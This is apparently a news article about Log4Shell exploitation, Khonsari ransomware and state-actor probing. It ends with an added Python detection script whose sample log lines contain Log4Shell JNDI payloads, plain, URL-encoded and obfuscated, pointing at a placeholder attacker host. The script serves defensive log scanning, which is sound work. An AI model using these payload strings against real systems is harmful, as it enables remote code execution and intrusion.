Security researchers have found evidence that the group behind the Khonsari ransomware is exploiting the Log4j vulnerability to deliver it. State-sponsored groups are also probing the vulnerability, according to researchers at CrowdStrike.
In a report on Monday, BitDefender’s Martin Zugec wrote that on Sunday his team saw attacks against Windows systems attempting to deploy a ransomware family called Khonsari.
Zugec told ZDNet that Khonsari is relatively new ransomware and is considered basic compared to the level of sophistication that is seen from more professional ransomware-as-a-service groups.
“Most likely, it is a threat actor experimenting with this new attack vector. However, that doesn’t mean that more advanced actors are not looking at exploiting the Log4j vulnerability, they most assuredly are. Instead of looking for the most simple, shortest route to monetization, they will use this window of opportunity to gain access to the networks and start preparing for a full-scale larger attack,” Zugec explained.
“We are seeing deployments of backdoors and remote shell deployments already. If you haven’t patched already, you may already have uninvited, dormant guests in your network.”
Cado Security released its own report on the ransomware, noting that it “weighs in at only 12 KB and contains only the most basic functionality required to perform its ransomware objective.”
“Its size and simplicity are also a strength, however: at the time we ran the malware dynamically it wasn’t detected by the system’s built-in antivirus,” Cado’s Matt Muir explained.
Ransomware expert Brett Callow called Khonsari “skid-level ransomware” but noted that it is safe to assume that some of the other actors attempting to exploit this vulnerability will be more advanced.
“Not all will be ransomware gangs. Threat actors of all stripes are attempting to find ways to use Log4j to their advantage,” Callow said.
McAfee Enterprise and FireEye Chief Scientist Raj Samani told ZDNet that most of the payloads attacking Log4j are currently a nuisance, but the ease with which the exploit can be deployed and the prevalence of vulnerable systems mean payloads could well become more destructive.
“Given the ability to execute arbitrary code using Log4Shell, malware and more specifically ransomware, certainly seems like the next logical attack phase ripe for exploitation. We do expect unpatched systems to continue to be exploited with a high likelihood of ransomware as a malicious payload,” said McAfee Enterprise and FireEye head of advanced threat research Steve Povolny.
Web servers are the most common systems under attack right now because they are easy to exploit and offer a good return on investment, according to ESET’s Marc-Étienne Léveillé, who added that in the next few weeks we will probably discover other software using Log4j that is vulnerable.
“I expect malicious groups will start scanning for those too,” Léveillé said.
Zugec explained that most zero-day vulnerabilities are first attacked by opportunists trying to breach vulnerable systems as fast as possible, which is the stage IT teams are currently in with Log4j.
The second stage, he said, involves the vulnerability becoming a tool used for more targeted attacks down the road.
“It is inevitable ransomware operators will seek to establish a foothold now and then exploit this vulnerability at a later stage to cause maximum impact,” Zugec said.
Adam Meyers, SVP of intelligence at CrowdStrike, said his team has observed the Iran-based state-sponsored actor NEMESIS KITTEN newly deploy onto a server a class file that could be triggered by Log4J.
“The timing, intent and capability are consistent with what would be the adversary attempting to exploit Log4J. CrowdStrike has previously observed NEMESIS KITTEN attempt both disruptive and destructive attacks,” Meyers added.
Sophos senior threat researcher Sean Gallagher explained that so far Log4Shell attackers have been focused on cryptomining, but called it the “lull before the storm”.
“We expect adversaries are likely grabbing as much access to whatever they can get right now with the view to monetize and/or capitalize on it later on. The most immediate priority for defenders is to reduce exposure by patching and mitigating all corners of their infrastructure and investigate exposed and potentially compromised systems. This vulnerability can be everywhere,” Gallagher said.
“Where systems have been identified as vulnerable, defenders should run an incident response process and monitor for signs of remote access trojans such as C2 call-backs. Secrets stored on exposed systems should also be rotated, particularly if they are exposed in environment variables. Lastly, consider critical third party vendors who may also be at risk.”
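Gallagher’s advice to investigate exposed systems raises the practical question of what to look for in the logs. The script below is an added example, not code from the article or from any of the vendors quoted in it. It scans web-server access-log lines for the `${jndi:...}` lookup that Log4Shell payloads rely on, first undoing URL encoding and the common obfuscations (`${lower:...}`, `${upper:...}` and the `${:-x}` default-value trick) that attackers use to slip past naive string matching. The log lines are constructed for the example; the host names in them are placeholders, not real indicators.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the article).
# Lines 2-4 carry Log4Shell-style lookups in plain, URL-encoded and
# obfuscated form; line 5 is a benign request that merely mentions "jndi".
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Dec/2021:10:01:22 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Dec/2021:10:01:23 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '198.51.100.8 - - [12/Dec/2021:10:01:24 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3A'
    '%24%7Blower%3Ar%7Dmi%3A%2F%2Fattacker.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.9 - - [12/Dec/2021:10:01:25 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/c}"',
    '203.0.113.6 - - [12/Dec/2021:10:01:26 +0000] "GET /docs/jndi-guide.html HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

# Innermost ${...} lookup: contains no nested "${" or "}".
INNERMOST = re.compile(r'\$\{([^${}]*)\}')
# A resolved JNDI lookup and the URI scheme it points at (ldap, rmi, dns, ...).
JNDI = re.compile(r'\$\{\s*jndi\s*:\s*([a-z0-9]+)\s*:', re.IGNORECASE)


def _resolve(match):
    """Evaluate one innermost Log4j-style lookup the way the obfuscations abuse it."""
    inner = match.group(1)
    key = inner.lower()
    if key.startswith('jndi:'):
        return match.group(0)          # keep the thing we want to detect
    if key.startswith('lower:'):
        return inner[len('lower:'):].lower()
    if key.startswith('upper:'):
        return inner[len('upper:'):].upper()
    if ':-' in inner:
        # ${name:-default}: an unknown lookup falls back to its default,
        # so ${::-j} becomes the literal "j".
        return inner.split(':-', 1)[1]
    return match.group(0)              # unknown lookup: leave in place


def normalize(text, max_rounds=20):
    """URL-decode (twice, for double encoding) and collapse nested lookups."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        new = INNERMOST.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def scan(lines):
    """Return one hit per log line containing a (de-obfuscated) JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        norm = normalize(line)
        m = JNDI.search(norm)
        if not m:
            continue
        end = norm.find('}', m.start())
        lookup = norm[m.start():end + 1] if end != -1 else norm[m.start():]
        hits.append({'line': number, 'scheme': m.group(1).lower(), 'lookup': lookup})
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} lookup {hit['lookup']}")
```

Run against the sample, the scanner reports lines 2, 3 and 4 (ldap, rmi and dns lookups respectively) and ignores line 5, which a plain grep for “jndi” would have flagged. Feed it real access, application and proxy logs, and treat any hit as a reason to start the incident-response process Gallagher describes, including rotating any secrets the affected host held in environment variables.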